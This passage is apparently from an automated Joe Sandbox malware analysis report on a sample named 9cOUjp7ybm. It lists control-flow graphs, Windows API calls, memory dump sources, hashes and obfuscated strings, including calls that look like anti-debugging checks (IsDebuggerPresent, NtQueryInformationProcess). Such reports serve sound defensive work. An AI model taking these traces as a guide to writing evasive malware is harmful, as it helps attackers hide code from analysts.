1540->1544 1541->1455 1543->1455 1546 6ce18638-6ce186db GetModuleHandleW call 6ce15540 call 6ce205b0 1544->1546 1547 6ce17bfc-6ce17c09 1544->1547 1546->1455 1551 6ce17c0f-6ce17c1c 1547->1551 1552 6ce181ce-6ce1823c 1547->1552 1556 6ce17f91-6ce18079 GetModuleHandleW call 6ce15540 call 6ce205b0 NtQueryInformationProcess 1551->1556 1557 6ce17c22-6ce17c2f 1551->1557 1552->1455 1556->1455 1562 6ce17c35-6ce17c42 1557->1562 1563 6ce1845c-6ce1846b 1557->1563 1566 6ce17c48-6ce17c55 1562->1566 1567 6ce1836e-6ce18375 1562->1567 1563->1455 1570 6ce17c5b-6ce17c68 1566->1570 1571 6ce1854c-6ce18553 1566->1571 1567->1455 1573 6ce17cfd-6ce17d1e 1570->1573 1574 6ce17c6e-6ce17c7b 1570->1574 1571->1455 1573->1455 1576 6ce17c81-6ce17c8e 1574->1576 1577 6ce1871c 1574->1577 1579 6ce18710-6ce18717 1576->1579 1580 6ce17c94-6ce17ca1 1576->1580 1577->1455 1579->1455 1582 6ce18241-6ce18288 1580->1582 1583 6ce17ca7-6ce17cb4 1580->1583 1582->1455 1585 6ce18450-6ce18457 1583->1585 1586 6ce17cba-6ce17cc7 1583->1586 1585->1455 1588 6ce183c8-6ce1843f 1586->1588 1589 6ce17ccd-6ce17cda 1586->1589 1588->1455 1591 6ce17ce0-6ce17ced 1589->1591 1592 6ce1808a-6ce1809f 1589->1592 1594 6ce17cf3-6ce17cf8 1591->1594 1595 6ce186ef-6ce186f6 1591->1595 1592->1455 1594->1455 1595->1455
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(?), ref: 6CE17FAB
                                                                                              • NtQueryInformationProcess.NTDLL ref: 6CE1802B
                                                                                              • GetModuleHandleW.KERNEL32(?), ref: 6CE18652
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$InformationProcessQuery
                                                                                              • String ID: NtQueryInformationProcess$ntdll.dll
                                                                                              • API String ID: 188072037-2906145389
                                                                                              • Opcode ID: f1c3275b2b4cbe73c951ceec3031248d8fdadd05b3386b39449f78308ee097e2
                                                                                              • Instruction ID: ea7b9b4d0326f9b6590b9535df0e4f4d66ff61fd86055e7c0746dfa38332f4d4
                                                                                              • Opcode Fuzzy Hash: f1c3275b2b4cbe73c951ceec3031248d8fdadd05b3386b39449f78308ee097e2
                                                                                              • Instruction Fuzzy Hash: CB720176B482058FCB08CEBCD5D53CE7BF2AB47354F21A61AD411DBB94D73A891A8B01

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1401 6ce1fae8-6ce1fafb call 6ce20350 1404 6ce1fb01-6ce1fb23 call 6ce1ff30 1401->1404 1405 6ce1fafd-6ce1faff 1401->1405 1409 6ce1fb90-6ce1fba9 call 6ce201ca call 6ce20350 1404->1409 1410 6ce1fb25-6ce1fb68 call 6ce1fffb call 6ce1feb7 call 6ce20319 call 6ce1fb7d call 6ce2019c call 6ce1fb8a 1404->1410 1406 6ce1fb6a-6ce1fb79 1405->1406 1422 6ce1fbab-6ce1fbb1 1409->1422 1423 6ce1fbba-6ce1fbc1 1409->1423 1410->1406 1422->1423 1424 6ce1fbb3-6ce1fbb5 1422->1424 1426 6ce1fbc3-6ce1fbc6 1423->1426 1427 6ce1fbcd-6ce1fbe1 dllmain_raw 1423->1427 1428 6ce1fc93-6ce1fca2 1424->1428 1426->1427 1430 6ce1fbc8-6ce1fbcb 1426->1430 1431 6ce1fbe7-6ce1fbf8 dllmain_crt_dispatch 1427->1431 1432 6ce1fc8a-6ce1fc91 1427->1432 1434 6ce1fbfe-6ce1fc10 call 6ce1ed30 1430->1434 1431->1432 1431->1434 1432->1428 1440 6ce1fc12-6ce1fc14 1434->1440 1441 6ce1fc39-6ce1fc3b 1434->1441 1440->1441 1444 6ce1fc16-6ce1fc34 call 6ce1ed30 call 6ce1fae8 dllmain_raw 1440->1444 1442 6ce1fc42-6ce1fc53 dllmain_crt_dispatch 1441->1442 1443 6ce1fc3d-6ce1fc40 1441->1443 1442->1432 1445 6ce1fc55-6ce1fc87 dllmain_raw 1442->1445 1443->1432 1443->1442 1444->1441 1445->1432
                                                                                              APIs
                                                                                              • __RTC_Initialize.LIBCMT ref: 6CE1FB2F
                                                                                              • ___scrt_uninitialize_crt.LIBCMT ref: 6CE1FB49
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Initialize___scrt_uninitialize_crt
                                                                                              • String ID:
                                                                                              • API String ID: 2442719207-0
                                                                                              • Opcode ID: 82f9a7066add725c5a66aa5eff10c532981a94149e3f2f31cd4f932d9fc47f8e
                                                                                              • Instruction ID: c29dd025a66b78ae9460c720ddd5cbcdded71cca6131b567a86f1f37c7ccc40e
                                                                                              • Opcode Fuzzy Hash: 82f9a7066add725c5a66aa5eff10c532981a94149e3f2f31cd4f932d9fc47f8e
                                                                                              • Instruction Fuzzy Hash: D841F272E08628AFDB118F69C840FDE3A78EB45B9CF30411AE81467F40C7394A65DBE0

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1597 6ce1fb98-6ce1fba9 call 6ce20350 1600 6ce1fbab-6ce1fbb1 1597->1600 1601 6ce1fbba-6ce1fbc1 1597->1601 1600->1601 1602 6ce1fbb3-6ce1fbb5 1600->1602 1603 6ce1fbc3-6ce1fbc6 1601->1603 1604 6ce1fbcd-6ce1fbe1 dllmain_raw 1601->1604 1605 6ce1fc93-6ce1fca2 1602->1605 1603->1604 1606 6ce1fbc8-6ce1fbcb 1603->1606 1607 6ce1fbe7-6ce1fbf8 dllmain_crt_dispatch 1604->1607 1608 6ce1fc8a-6ce1fc91 1604->1608 1609 6ce1fbfe-6ce1fc10 call 6ce1ed30 1606->1609 1607->1608 1607->1609 1608->1605 1612 6ce1fc12-6ce1fc14 1609->1612 1613 6ce1fc39-6ce1fc3b 1609->1613 1612->1613 1616 6ce1fc16-6ce1fc34 call 6ce1ed30 call 6ce1fae8 dllmain_raw 1612->1616 1614 6ce1fc42-6ce1fc53 dllmain_crt_dispatch 1613->1614 1615 6ce1fc3d-6ce1fc40 1613->1615 1614->1608 1617 6ce1fc55-6ce1fc87 dllmain_raw 1614->1617 1615->1608 1615->1614 1616->1613 1617->1608
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                              • String ID:
                                                                                              • API String ID: 3136044242-0
                                                                                              • Opcode ID: 401bd02b3709007dc62e50fab7b7cbf6922167914f7ea556e1413b673c6c5c6e
                                                                                              • Instruction ID: 6d1a9f278a1fefb882c75c8d90085aa5fcfc9254283b165b00bf3d4e3d707324
                                                                                              • Opcode Fuzzy Hash: 401bd02b3709007dc62e50fab7b7cbf6922167914f7ea556e1413b673c6c5c6e
                                                                                              • Instruction Fuzzy Hash: 1F21A172D09629BBCB218E65C840EAF3A79EB85BDCB314119FC1457F10D7398D619BE0

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1623 6ce1f9e1-6ce1f9f7 call 6ce20350 call 6ce2002b 1628 6ce1f9fd-6ce1fa15 call 6ce1ff30 1623->1628 1629 6ce1face 1623->1629 1633 6ce1fae0-6ce1fae7 call 6ce201ca 1628->1633 1634 6ce1fa1b-6ce1fa2c call 6ce1ff8d 1628->1634 1631 6ce1fad0-6ce1fadf 1629->1631 1639 6ce1fa7b-6ce1fa89 call 6ce1fac4 1634->1639 1640 6ce1fa2e-6ce1fa47 call 6ce202ed call 6ce1feab call 6ce1fecf call 6ce21611 1634->1640 1639->1629 1645 6ce1fa8b-6ce1fa95 call 6ce201c4 1639->1645 1657 6ce1fa4c-6ce1fa50 1640->1657 1651 6ce1fa97-6ce1faa0 call 6ce200eb 1645->1651 1652 6ce1fab6-6ce1fabf 1645->1652 1651->1652 1658 6ce1faa2-6ce1fab4 1651->1658 1652->1631 1657->1639 1659 6ce1fa52-6ce1fa59 call 6ce1ff62 1657->1659 1658->1652 1659->1639 1663 6ce1fa5b-6ce1fa78 call 6ce215cc 1659->1663 1663->1639
                                                                                              APIs
                                                                                              • __RTC_Initialize.LIBCMT ref: 6CE1FA2E
                                                                                                • Part of subcall function 6CE1FEAB: InitializeSListHead.KERNEL32(6CE7BF88,6CE1FA38,6CE2F0D8,00000010,6CE1F9C9,?,?,?,6CE1FBF1,?,00000001,?,?,00000001,?,6CE2F120), ref: 6CE1FEB0
                                                                                              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CE1FA98
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                              • String ID:
                                                                                              • API String ID: 3231365870-0
                                                                                              • Opcode ID: 03e0bbf75e808b4a00b930440352e9d8844f2a8982a140ce6dd96bfa304418be
                                                                                              • Instruction ID: 9e9afee2fd2907b28350fd4918e51bb5de2ffba381e393c3c68819148d872980
                                                                                              • Opcode Fuzzy Hash: 03e0bbf75e808b4a00b930440352e9d8844f2a8982a140ce6dd96bfa304418be
                                                                                              • Instruction Fuzzy Hash: 7221F072A8D2449ADB05ABB88811BDD37B09F0636CF38494ED54127FC2CB2E4019C6E5

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1666 6ce2480d-6ce24812 1667 6ce24814-6ce2482c 1666->1667 1668 6ce2483a-6ce24843 1667->1668 1669 6ce2482e-6ce24832 1667->1669 1670 6ce24855 1668->1670 1671 6ce24845-6ce24848 1668->1671 1669->1668 1672 6ce24834-6ce24838 1669->1672 1675 6ce24857-6ce24864 GetStdHandle 1670->1675 1673 6ce24851-6ce24853 1671->1673 1674 6ce2484a-6ce2484f 1671->1674 1676 6ce248b3-6ce248b7 1672->1676 1673->1675 1674->1675 1678 6ce24873 1675->1678 1679 6ce24866-6ce24868 1675->1679 1676->1667 1677 6ce248bd-6ce248c0 1676->1677 1681 6ce24875-6ce24877 1678->1681 1679->1678 1680 6ce2486a-6ce24871 GetFileType 1679->1680 1680->1681 1682 6ce24895-6ce248a7 1681->1682 1683 6ce24879-6ce24882 1681->1683 1682->1676 1686 6ce248a9-6ce248ac 1682->1686 1684 6ce24884-6ce24888 1683->1684 1685 6ce2488a-6ce2488d 1683->1685 1684->1676 1685->1676 1687 6ce2488f-6ce24893 1685->1687 1686->1676 1687->1676
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 6CE24859
                                                                                              • GetFileType.KERNELBASE(00000000), ref: 6CE2486B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileHandleType
                                                                                              • String ID:
                                                                                              • API String ID: 3000768030-0
                                                                                              • Opcode ID: f467c63b3478720105ce81a7a17b75a7daf36e5b9b9c8fa8e6d80d72a1e38d0e
                                                                                              • Instruction ID: e3b3cdbf5ec14f74c3ce6abceedd9fef59763935b1b44a0b08b1a64cee15a80e
                                                                                              • Opcode Fuzzy Hash: f467c63b3478720105ce81a7a17b75a7daf36e5b9b9c8fa8e6d80d72a1e38d0e
                                                                                              • Instruction Fuzzy Hash: A41190726287D18AD7284E3E8884712BAF4E74723CB38071BF1B6C6AE1C27CD586C641

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1688 6ce25070-6ce2507b 1689 6ce25084-6ce25086 1688->1689 1690 6ce2507d-6ce25082 1688->1690 1692 6ce25088 1689->1692 1693 6ce2508f-6ce25092 call 6ce22dd6 1689->1693 1691 6ce2508a 1690->1691 1691->1693 1692->1691 1695 6ce25097-6ce250ad call 6ce22e33 1693->1695 1698 6ce250da-6ce250dd 1695->1698 1699 6ce250af-6ce250d3 call 6ce22dd6 call 6ce22e33 1695->1699 1700 6ce250e2-6ce25115 call 6ce24602 1698->1700 1699->1698 1709 6ce250d5-6ce250d9 1699->1709 1707 6ce25120 1700->1707 1708 6ce25117-6ce2511a 1700->1708 1711 6ce25127-6ce25131 1707->1711 1708->1707 1710 6ce2511c-6ce2511e 1708->1710 1710->1707 1710->1711 1711->1700 1712 6ce25133-6ce25137 1711->1712
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free
                                                                                              • String ID:
                                                                                              • API String ID: 269201875-0
                                                                                              • Opcode ID: 20f458ee84dff37c43d3be6232ae25790992d35b648e5c3aabd85c8569ac20b6
                                                                                              • Instruction ID: 6f0ff5c6f6ec108992baf2fdfa345a8cd344834b27b21b709389d307d2b0dbd9
                                                                                              • Opcode Fuzzy Hash: 20f458ee84dff37c43d3be6232ae25790992d35b648e5c3aabd85c8569ac20b6
                                                                                              • Instruction Fuzzy Hash: 7811D371B022205BDB21EE6D9D46F5572B8A752B3CF38171AE521CABC4E378C64386D0

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1713 6ce22dd6-6ce22de1 1714 6ce22de3-6ce22ded 1713->1714 1715 6ce22def-6ce22df5 1713->1715 1714->1715 1716 6ce22e23-6ce22e2e call 6ce22dc3 1714->1716 1717 6ce22df7-6ce22df8 1715->1717 1718 6ce22e0e-6ce22e1f RtlAllocateHeap 1715->1718 1724 6ce22e30-6ce22e32 1716->1724 1717->1718 1719 6ce22e21 1718->1719 1720 6ce22dfa-6ce22e01 call 6ce25835 1718->1720 1719->1724 1720->1716 1726 6ce22e03-6ce22e0c call 6ce249f5 1720->1726 1726->1716 1726->1718
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6CE229D9,00000001,00000364,00000013,000000FF,?,00000001,6CE22DC8,6CE22E59,?,?,6CE2206C), ref: 6CE22E17
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 83284ff35286037bc48aacb5b3113e831aa421809fc7b0288700a3534cef103e
                                                                                              • Instruction ID: 94284614787aad01e392439422e9577b48a77de924e3d3b2f4b6a24f81c2fe29
                                                                                              • Opcode Fuzzy Hash: 83284ff35286037bc48aacb5b3113e831aa421809fc7b0288700a3534cef103e
                                                                                              • Instruction Fuzzy Hash: FDF05932626120A7EB131A26CC0CB8B3778DF5237CB344125E814AFA80CF6CD50196E5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: JSrR$JSrR$~5 $~5 $IOZ$|f
                                                                                              • API String ID: 0-3809505917
                                                                                              • Opcode ID: fe17b8734de73abb723d4c4f92eeed9eda889564c76b019c99449b44b29bffee
                                                                                              • Instruction ID: 2d46ee98a7a49d0f3183b3eed405604e35f5a27d0c05e95553cf7137474e859b
                                                                                              • Opcode Fuzzy Hash: fe17b8734de73abb723d4c4f92eeed9eda889564c76b019c99449b44b29bffee
                                                                                              • Instruction Fuzzy Hash: 5003F176B592218FDB04CE3CC9D17C977F2AB47328F209159D429DBB91C6368A4ACF12
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: #fw$,\)B$-X*^$2=$7$YdB3$adB3
                                                                                              • API String ID: 0-2780812687
                                                                                              • Opcode ID: 79c70f3de171f4b962685fecb4a6db868b02356db63634a51b506dd75daea30c
                                                                                              • Instruction ID: e24c0d87933da341d50c242bfc2a7810bc6412661cd9066a88db6538aed54372
                                                                                              • Opcode Fuzzy Hash: 79c70f3de171f4b962685fecb4a6db868b02356db63634a51b506dd75daea30c
                                                                                              • Instruction Fuzzy Hash: 2342E172A083508BD714CF24D8807ABBBE2EFC5314F198A2DE5D59B391D778D806CB46
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: &$$;J$$$O$2[&%$AANH$M~~l$h
                                                                                              • API String ID: 0-1741070211
                                                                                              • Opcode ID: 97cc7e1ae2337564fa2afce9ca616d04b7b310bea86d6f6aae1dbb0b95b2e415
                                                                                              • Instruction ID: fec9a991b953ca35e28cebece1879da7d1c19186631334664b50e74ac1add9e2
                                                                                              • Opcode Fuzzy Hash: 97cc7e1ae2337564fa2afce9ca616d04b7b310bea86d6f6aae1dbb0b95b2e415
                                                                                              • Instruction Fuzzy Hash: F181A9B450D3918BD339CF2984A17EBBBE2EBD6304F18896DD4D94B382C7354449CB96
                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CE22C52
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CE22C5C
                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CE22C69
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                              • String ID: ,TOl
                                                                                              • API String ID: 3906539128-2377915434
                                                                                              • Opcode ID: 7b3768492a975a94cd76b954a92253495098128590f1eff604261307ab770fdf
                                                                                              • Instruction ID: 70ca518ab61deb9acf1fe57f08923cf96972a64b64740009f5521c0028c59854
                                                                                              • Opcode Fuzzy Hash: 7b3768492a975a94cd76b954a92253495098128590f1eff604261307ab770fdf
                                                                                              • Instruction Fuzzy Hash: D631E67595122C9BCB21DF64D888BCCBBB8BF18314F6041DAE41CA7290E7349B858F44
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6CE201D6
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 6CE202A2
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CE202C2
                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 6CE202CC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 254469556-0
                                                                                              • Opcode ID: d5227f155d214591bbe25bbc5a4cde6a9bf1d29b41911954e855122b55f5741c
                                                                                              • Instruction ID: 6b304dce6191fc7493cb05094320d2a972856c56340e3e2883d7e9feb1a3b47b
                                                                                              • Opcode Fuzzy Hash: d5227f155d214591bbe25bbc5a4cde6a9bf1d29b41911954e855122b55f5741c
                                                                                              • Instruction Fuzzy Hash: 3D31FB75D453589BDF10DFA4D989BCDBBB8BF08304F20419AE40DA7280EB755A89CF45
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(?,?,6CE21954,?,00000001,?,?), ref: 6CE21977
                                                                                              • TerminateProcess.KERNEL32(00000000,?,6CE21954,?,00000001,?,?), ref: 6CE2197E
                                                                                              • ExitProcess.KERNEL32 ref: 6CE21990
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 1703294689-0
                                                                                              • Opcode ID: c50976e142a7cf7bc0e596d4688824c91d97fe26e2d11b1d9e3683abc939920c
                                                                                              • Instruction ID: ff09abb0357fe6b972d8fffbcc5956cf6409f63552102cad9f05f87a6a51f38d
                                                                                              • Opcode Fuzzy Hash: c50976e142a7cf7bc0e596d4688824c91d97fe26e2d11b1d9e3683abc939920c
                                                                                              • Instruction Fuzzy Hash: 4CE08631140108EFCF126F90CD08FD87B79FF05249B200518F40986620CB3EDE46DB80
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ddg$[)^+$f-./
                                                                                              • API String ID: 0-1799054822
                                                                                              • Opcode ID: 47f42eaa36760ffd118ac33e81c4a6798d9596c72952d786d850ec147c6d4cf5
                                                                                              • Instruction ID: 4101ff7d359f92ea000f669f04f3d171384972b93ad59f4348ba5ae7dd4f9e43
                                                                                              • Opcode Fuzzy Hash: 47f42eaa36760ffd118ac33e81c4a6798d9596c72952d786d850ec147c6d4cf5
                                                                                              • Instruction Fuzzy Hash: 225146B6A183518BC724CF25C8806A7B7E1EFC6304F08997DE5D69B345E3788904CB9A
                                                                                              Strings
                                                                                              Memory Dump Source
